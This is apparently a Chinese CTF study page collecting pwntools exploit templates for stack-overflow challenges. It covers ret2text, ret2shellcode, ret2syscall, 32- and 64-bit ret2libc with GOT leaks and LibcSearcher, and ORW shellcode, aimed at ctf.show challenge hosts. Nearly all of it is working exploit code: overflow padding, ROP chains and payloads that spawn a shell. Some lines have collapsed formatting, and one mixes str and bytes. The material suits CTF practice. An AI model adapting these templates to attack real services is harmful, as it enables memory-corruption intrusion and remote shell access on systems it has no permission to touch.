模板
ret2text
from pwn import *
context(arch="i386",os="linux",log_level="debug")
filename="./pwn"
# p = remote("pwn.challenge.ctf.show",28104)
p=process(filename)
elf=ELF(filename)
flag_addr=elf.sym['backdoor']
padding=0x12+4
payload=padding*b'a'+p32(flag_addr)
p.sendline(payload)
p.interactive()
ret2shellcode
from pwn import *
context(arch="i386",os="linux",log_level="debug")
filename="./pwn"
sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080
sh.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
sh.interactive()
ret2syscall
一般用于静态编译
有system,有bin/sh
有system,无bin/sh
-
有sh
用sh代替bin/sh
-
无
用get输入bin/sh到变量中,向system传入这个变量
from pwn import * context(arch = 'i386',os = 'linux',log_level = 'debug') io = process('./pwn') #io = remote('pwn.challenge.ctf.show',28116) elf = ELF('./pwn') system = elf.sym['system'] buf2 = 0x804B060 gets = elf.sym['gets'] pop_ebx = 0x8048409 # 0x08048409 : pop ebx ; ret payload = cyclic(0x6c+4) + p32(gets) + p32(pop_ebx) + p32(buf2) + p32(system) + 'aaaa' + p32(buf2) io.sendline(payload) io.sendline("/bin/sh") io.recv() io.interactive()
ret2libc
LibcSearcher传入的是整数类型
无system,无bin/sh
思路:
- 通过puts等函数泄露出来这个函数__在got表的地址__
- 用libc.address=puts_addr-libc.sym['puts']计算偏移量,算出程序里的system函数和字符串“/bin/sh”的地址
- 利用溢出漏洞,构造rop,获取shell
32位
from pwn import *
from LibcSearcher import LibcSearcher
context(arch="i386",os="linux",log_level="debug")
filename="./pwn"
#p = remote("pwn.challenge.ctf.show",28121)
p=process(filename)
elf = ELF(filename)
padding = 0x6B+0x4
main_addr = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload=flat([ b'a' * padding,puts_plt,main_addr,puts_got])
p.sendline(payload)
puts_addr = u32(p.recvuntil('\xf7')[-4:])
print(hex(puts_addr))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
print(hex(libc_base))
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")
payload=flat([b'a' * padding,system_addr,b'a' * 4,binsh_addr])
p.sendline(payload)
p.interactive()
64位
from pwn import *
from LibcSearcher import LibcSearcher
context(arch="amd64",os="linux",log_level="debug")
filename="./pwn"
#p = remote("pwn.challenge.ctf.show", 28233)
p=process(filename)
elf = ELF(filename)
# gdb.attach(p)
# pause()
padding = 0x20+0x8
main_addr = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_ret=0x4007e3
ret_addr=0x04004fe
payload=flat([ b'a' * padding,rdi_ret,puts_got,puts_plt,ret_addr,main_addr])
p.sendline(payload)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
#本地
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# libc_base=puts_addr-libc.symbols['puts']
# system_addr=libc_base+libc.symbols['system']
# binsh_addr=libc_base+next(libc.search(b"/bin/sh"))
# payload=flat([b'a' * padding,rdi_ret,binsh_addr,system_addr])
# p.sendline(payload)
#远程
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
print(hex(libc_base))
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")
payload=flat([b'a' * padding,rdi_ret,binsh_addr,system_addr])
p.sendline(payload)
p.interactive()
题目给泄露出的字符串wp参考
from pwn import *
from LibcSearcher import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28297)
elf = ELF('./pwn')
io.recvuntil("puts: ")
puts = eval(io.recvuntil("\n" , drop = True))
io.recvuntil("gift: ")
bin_sh = eval(io.recvuntil("\n" , drop = True))
libc = LibcSearcher("puts" , puts)
libc_base = puts - libc.dump("puts")
system = libc_base + libc.dump("system")
paylad = b"a"*(0x9c+4) + p32(system) + p32(0) + p32(bin_sh)
io.sendline(paylad)
io.interactive()
ORW
shell_code = shellcraft.open("/flag")
shell_code += shellcraft.read(3,mmap_addr,0x100)
shell_code += shellcraft.write(1,mmap_addr,0x100)
shell_code = asm(shell_code)
浙公网安备 33010602011771号